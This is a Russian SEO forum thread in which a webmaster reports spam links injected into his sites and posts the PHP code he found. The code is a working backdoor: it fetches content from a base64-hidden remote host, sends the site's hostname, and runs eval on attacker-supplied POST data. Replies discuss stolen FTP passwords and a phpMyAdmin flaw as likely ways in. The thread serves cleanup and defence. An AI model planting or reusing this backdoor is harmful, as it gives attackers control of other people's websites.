- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
В 2023 году Google заблокировал более 170 млн фальшивых отзывов на Картах
Это на 45% больше, чем в 2022 году
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Сегодня обнаружил на нескольких сайтах в подвале вот такой код, походу партнера.
Как наказать скотов ? В ментовку заяву писать - скажут давай сервер сюда.
<a href="http://www.pspscene.ru/images/d5/">похудеть</a> <a href="http://dpclub.ru/images/di">диеты</a> <a href="http://kinoraduga.ru/f1/">сбросить вес</a> <a href="http://univerpost.ru/f3/">похудеть</a> <a href="http://alpbook.info/">купить антикварные книги</a> <a href="http://actbook.info/">купить старые книги</a> <a href="http://apebook.info/">куплю старую книгу</a> <a href="http://agebook.info/">куплю электронную книгу</a> <a href="http://ahabook.info/">куплю книги из домашней библиотеки</a> <a href="http://atebook.info/">какую книгу купить</a>
У себя код почистил - проблема была в том что заливались файлы через quteFTP с "лекарством".
Вот через этот код выводится
<?
error_reporting(0);
function fetch($url) {
if (function_exists('curl_exec')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT,6);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0');
return curl_exec($ch);
curl_close($ch);
}
else {
return @file_get_contents($url);
}}
$base='aHR0cDovL2RpcGxvYWQudXMudG8vY29udGVudC8=';
$enc='utf';
echo @fetch(base64_decode($base).'?host='.urlencode($_SERVER['HTTP_HOST'])."&$enc");
if($_POST['id']==$base) eval($_POST['ev']);
?>
Welcome in real Internet :D
А что он делал на вашем сайте? :D
Нашел скотов - вот отсюда урлы берутся
stydent добавил 23.09.2010 в 18:48
Welcome in real Internet :D
А что он делал на вашем сайте? :D
Да с этим уже сталкивался - сам юзаю Filezilla и пароли вручную ввожу, тут отдавал работу по наполнению - оказывается еще некоторые юзают :)
Речь сейчас о другом, что делать с этими скотами?
Тупо забить на все это. Таких людей армия...место одного павшего война, занимает другой.
95%, что ты с ними ничего не сделаешь. А даже, если все-таки дело дойдет до конца и суд признает виновными, то отделаются незначительным штрафом. Больше потратишь времени, нервов и денег.
Тупо забить на все это. Таких людей армия...место одного павшего война, занимает другой.
+1 почистить всё и забить на это ! Гемора только больше найдёте 🤪
Все могло быть жестче - вам самому могли подкинуть дорвея на сайтик. 🍿 Можете забить на все на это, сменить пароли и впредь быть осторожнее.
Да с этим уже сталкивался - сам юзаю Filezilla и пароли вручную ввожу, тут отдавал работу по наполнению - оказывается еще некоторые юзают
Ставьте временный пароль на время работ, потом меняйте опять на свой секретный.
В свете последних событий у Вас, скорее всего, сервер поламали через уязвимость в phpmyadmin, у меня с аналогичным кодом в папке /tmp/ лежал файлик и были инклуды на него на всех сайтах на сервере.
$base='aHR0cDovL2RpcGxvYWQudXMudG8vY29udGVudC8='; декодируется в
Убедитесь что у вас PhpMyAdmin последней версии (если ветка 2.x), до 2.11.10 он дыряв и есть эксплойт.